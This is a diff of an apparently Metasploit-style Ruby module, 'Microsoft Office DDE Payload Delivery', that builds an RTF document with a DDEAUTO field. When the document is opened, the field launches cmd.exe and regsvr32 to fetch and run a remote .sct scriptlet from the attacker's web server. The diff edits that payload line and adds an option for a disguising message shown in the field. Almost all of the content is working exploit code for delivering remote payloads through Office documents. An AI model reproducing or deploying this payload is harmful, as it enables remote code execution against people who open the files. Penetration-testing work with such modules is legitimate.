@@ -17,8 +17,8 @@ def initialize(info = {})
17
17
'Name' => 'Microsoft Office DDE Payload Delivery' ,
18
18
'Description' => %q{
19
19
This module generates an DDE command to place within
20
- a word document, that when executed, will retrieve a HTA payload
21
- via HTTP from an web server.
20
+ a word document, that when executed, will retrieve a payload
21
+ from the webserver
22
22
} ,
23
23
'Author' => 'mumbai' ,
24
24
'License' => MSF_LICENSE ,
@@ -40,6 +40,10 @@ def initialize(info = {})
40
40
OptString . new ( "FILENAME" , [ true , "Filename to save as, or inject" , "msf.rtf" ] ) ,
41
41
OptString . new ( "FOLDER_PATH" , [ false , "Path to file to inject" , nil ] )
42
42
] )
43
+
44
+ register_advanced_options ( [
45
+ OptString . new ( "MESSAGE" , [ true , "Message to output in remote data field" , "MSF EXECUTABLE" ] )
46
+ ] )
43
47
end
44
48
45
49
def gen_psh ( url , *method )
@@ -134,7 +138,7 @@ def create_rtf
134
138
#
135
139
header = retrieve_header ( datastore [ 'FILENAME' ] )
136
140
field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165 '
137
- field_class << "DDEAUTO C:\\ \\ \\ \\ Programs\\ \\ \\ \\ Microsoft\\ \\ \\ \\ Office\\ \\ \\ \\ MSword.exe\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ Windows\\ \\ \\ \\ System32\\ \\ \\ \\ cmd.exe \" /c regsvr32 /s /n /u /i:#{ get_uri } .sct scrobj.dll\" }}"
141
+ field_class << "DDEAUTO \" C:\\ \\ \\ \\ Programs\\ \\ \\ \\ Microsoft\\ \\ \\ \\ Office\\ \\ \\ \\ MSword.exe\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ Windows\\ \\ \\ \\ System32\\ \\ \\ \\ cmd.exe /c regsvr32 /s /n /u /i:#{ get_uri } .sct scrobj.dll\" \" #{ datastore [ 'MESSAGE' ] } \" }}"
138
142
field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n "
139
143
field_class << '\insrsid5790315' + "\n "
140
144
field_class << '\par }'
0 commit comments